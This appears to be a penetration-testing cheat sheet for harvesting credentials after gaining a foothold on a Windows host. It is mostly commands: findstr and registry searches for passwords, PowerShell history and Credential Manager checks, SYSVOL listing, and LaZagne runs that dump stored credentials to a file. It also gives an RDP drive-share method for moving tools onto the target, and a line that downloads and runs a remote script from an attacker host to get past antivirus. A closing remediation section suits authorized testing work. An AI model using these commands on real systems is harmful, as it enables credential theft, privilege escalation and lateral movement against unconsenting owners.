🛡️ Methodology Checklist
- File search:
findstr /SIM /C:"password" *.txt *.xml *.ini *.config 2>nul - Registry creds:
reg query HKLM /f password /t REG_SZ /s - PowerShell history:
(Get-PSReadLineOption).HistorySavePath - Credential Manager:
cmdkey /list - Autologon:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" - Unattend.xml:
C:\Windows\Panther\Unattend.xml - Chrome/Firefox saved passwords (requires user session)
- LaZagne:
lazagne.exe all
🎯 Operational Context
Use when: Windows foothold obtained — hunt for credentials in registry, config files, credential manager, PowerShell history, and IIS web.config.
Think Dumber First: type C:\Users\[USER]\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt — PowerShell history is the Windows equivalent of bash_history. Run it immediately. Then check C:\inetpub\wwwroot\web.config for DB strings.
Skip when: Already have SYSTEM — dump LSASS directly instead of file hunting.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml | Search file contents for “password” keyword (case-insensitive, recursive) |
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml | Common config file variant |
C:\Temp\lazagne.exe all | Run LaZagne — dump all stored credentials |
C:\Temp\lazagne.exe all > C:\Temp\passwords.txt | LaZagne output to file |
dir /s \\[DC_IP]\SYSVOL | List SYSVOL share contents (readable by all domain users) |
xfreerdp3 /v:[TARGET_IP] /u:[USER] /p:[PASS] /drive:share,$(pwd) | RDP with drive share to transfer LaZagne |
net use | List mapped network drives |
🔬 Deep Dive & Workflow
Search Strategy by User Role
Don’t search blindly — target locations based on the compromised account’s function:
| Role | High-Value Locations |
|---|---|
| IT Admin | RDP .rdp files, PuTTY sessions, WinSCP configs, KeePass .kdbx |
| Developer | web.config, .git dirs, API keys in source, connection strings |
| HR / Finance | Excel/Word files named “passwords”, “accounts”, “logins” |
findstr — Living-off-the-Land Search
Built into every Windows installation — no upload required:
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml/S— search subdirectories/I— case-insensitive/M— print filenames only (suppress matching lines for clean output)
Expand the keyword list for broader coverage:
password, passphrase, pwd, creds, credentials, dbpassword, dbcredential, login, key, secret, token
LaZagne — Automated Credential Extraction
LaZagne extracts stored credentials from browsers, Wi-Fi profiles, sysadmin tools (WinSCP, PuTTY, FileZilla), and memory.
Transfer via RDP drive share (no separate upload needed):
xfreerdp3 /v:[TARGET_IP] /u:[USER] /p:[PASS] /drive:share,$(pwd)
# File accessible at \\tsclient\share\lazagne.exe on targetCritical: Do NOT run with start LaZagne.exe — it opens a new window that closes instantly before output can be read. Run directly:
C:\Temp\lazagne.exe all
C:\Temp\lazagne.exe all > C:\Temp\passwords.txtSYSVOL — Domain-Wide Readable Share
Every domain user can read SYSVOL on the Domain Controller. It contains Group Policy scripts and XML files that often have embedded credentials (historically from Group Policy Preferences):
dir /s \\[DC_IP]\SYSVOLAlso accessible via Explorer: \\[DC_IP]\SYSVOL
High-Value File Locations
| File | Path | Contains |
|---|---|---|
web.config | C:\inetpub\wwwroot\ | DB connection strings |
Unattend.xml | C:\Windows\Panther\ | Leftover install credentials |
KeePass .kdbx | User profile dirs | Credential vaults |
.rdp files | Desktop, Documents | Saved RDP sessions with credentials |
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| PSReadLine history file not found | PowerShell history disabled or different path | Check: (Get-PSReadlineOption).HistorySavePath for actual path |
| reg query for passwords returns empty | Key doesn’t exist | Try broader: reg query HKLM /f password /t REG_SZ /s 2>nul (slow but thorough) |
| web.config access denied | IIS running as low-privilege | Check other config locations: C:\inetpub\wwwroot\web.config, C:\Windows\Microsoft.NET\Framework*\CONFIG\ |
| winpeas.exe detected by AV | Default signature | Run PowerShell version: IEX (New-Object Net.WebClient).DownloadString('http://[LHOST]/winPEASany.ps1') |
| Windows Credential Manager empty | No saved creds | Check for .rdp files: dir /s /b *.rdp 2>nul; also cmdkey /list for stored credentials |
📝 Reporting Trigger
Finding Title: Plaintext Credentials Found in Windows Credential Storage Impact: Credentials stored in Windows Credential Manager, registry, PowerShell history, or configuration files allow privilege escalation and lateral movement without brute force or vulnerability exploitation. Root Cause: Applications and users store credentials in easily accessible Windows credential storage mechanisms without encryption. Recommendation: Implement Windows Credential Guard to protect stored credentials. Clear PowerShell history on shared systems. Use LAPS for local admin passwords. Audit Windows Credential Manager content on all systems.